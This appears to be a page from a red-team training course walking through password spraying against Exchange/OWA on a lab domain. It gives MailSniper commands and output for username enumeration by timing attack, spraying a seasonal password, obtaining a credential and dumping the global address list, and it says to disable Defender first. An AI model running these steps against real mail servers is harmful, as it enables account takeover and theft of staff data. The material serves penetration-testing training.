Password Spraying

Password spraying is an effective technique for discovering weak passwords that users are notorious for using. Patterns such as MonthYear (August2019), SeasonYear (Summer2019) and DayDate (Tuesday6) are very common.

Be cautious of localisations, e.g. Autumn vs Fall.

Two excellent tools for password spraying against Office 365 and Exchange are MailSniper and SprayingToolkit. On the Attacker Desktop VM, open PowerShell and import MailSniper.ps1.

PS C:\Users\Attacker> ipmo C:\Tools\MailSniper\MailSniper.ps1

You'll have to disable Defender's Real-time protection first.

Enumerate the NetBIOS name of the target domain with Invoke-DomainHarvestOWA.

PS C:\Users\Attacker> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io
[*] Harvesting domain name from the server at mail.cyberbotic.io
The domain appears to be: CYBER or cyberbotic.io

Next, we need to find valid usernames from the list of users enumerated from https://cyberbotic.io.

ubuntu@DESKTOP-3BSK7NO ~> cd /mnt/c/Users/Attacker/Desktop/
ubuntu@DESKTOP-3BSK7NO /m/c/U/A/Desktop> cat names.txt
Bob Farmer
Isabel Yates
John King
Joyce Adams

namemash.py is a python script that I've used for as long as I can remember. It will take a person's full name and transform it into possible username permutations.

ubuntu@DESKTOP-3BSK7NO /m/c/U/A/Desktop> ~/namemash.py names.txt > possible.txt
ubuntu@DESKTOP-3BSK7NO /m/c/U/A/Desktop> head -n 5 possible.txt
bobfarmer
farmerbob
bob.farmer
farmer.bob
farmerb

We could potentially skip this step if we knew the email address format from somewhere like hunter.io.

Invoke-UsernameHarvestOWA uses a timing attack to validate which (if any) of these usernames are valid.

PS C:\Users\Attacker> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt
[*] Now spraying the OWA portal at https://10.10.15.100/owa/
Determining baseline response time...
Response Time (MS)       Domain\Username
763                      cyberbotic.io\OkAJfr
738                      cyberbotic.io\UGVuQv
750                      cyberbotic.io\ztHyFf
749                      cyberbotic.io\dsLWDY
762                      cyberbotic.io\YgFBIP

         Baseline Response: 752.4

Threshold: 460.44
Response Time (MS)       Domain\Username
[*] Potentially Valid! User:cyberbotic.io\bfarmer
[*] Potentially Valid! User:cyberbotic.io\iyates
[*] Potentially Valid! User:cyberbotic.io\jking
[*] A total of 3 potentially valid usernames found.
Results have been written to .\Desktop\valid.txt.

MailSniper can spray passwords against the valid account(s) identified using, Outlook Web Access (OWA), Exchange Web Services (EWS) and Exchange ActiveSync (EAS).

PS C:\Users\Attacker> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\Desktop\valid.txt -Password Summer2022
[*] Now spraying the OWA portal at https://mail.cyberbotic.io/owa/
[*] SUCCESS! User:cyberbotic.io\iyates Password:Summer2022
[*] A total of 1 credentials were obtained.

OPSEC In the real world, be aware that these authentication attempts may count towards the domain lockout policy for the users. Too many attempts in a short space of time are not only loud but may also lock accounts out.

We can do further actions using MailSniper with valid credentials, such as downloading the global address list.

PS C:\Users\Attacker> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt
[*] First trying to log directly into OWA to enumerate the Global Address List using FindPeople...
[*] This method requires PowerShell Version 3.0
[*] Using https://mail.cyberbotic.io/owa/auth.owa
[*] Logging into OWA...
[*] OWA Login appears to be successful.
[*] Retrieving OWA Canary...
[*] Successfully retrieved the X-OWA-CANARY cookie: inZQ6n60_UyNcY3V8sVYr1DImQcoetoIYpwY8yzSQWjVvGL9UusKPBKv5I4Og1zqe18vsxnG_sg.
[*] Retrieving AddressListId from GetPeopleFilters URL.
[*] Global Address List Id of b4477ba8-52b0-48bf-915e-d179db98788b was found.
[*] Now utilizing FindPeople to retrieve Global Address List
[*] Now cleaning up the list...
bfarmer@cyberbotic.io
iyates@cyberbotic.io
jking@cyberbotic.io
nglover@cyberbotic.io
nlamb@cyberbotic.io
[*] A total of 5 email addresses were retrieved
[*] Email addresses have been written to .\Desktop\gal.txt

If there are names here that we didn't find during initial recon, we can go back and do another round of spraying against them.

PreviousInitial Compromise NextInternal Phishing

Last updated 2 years ago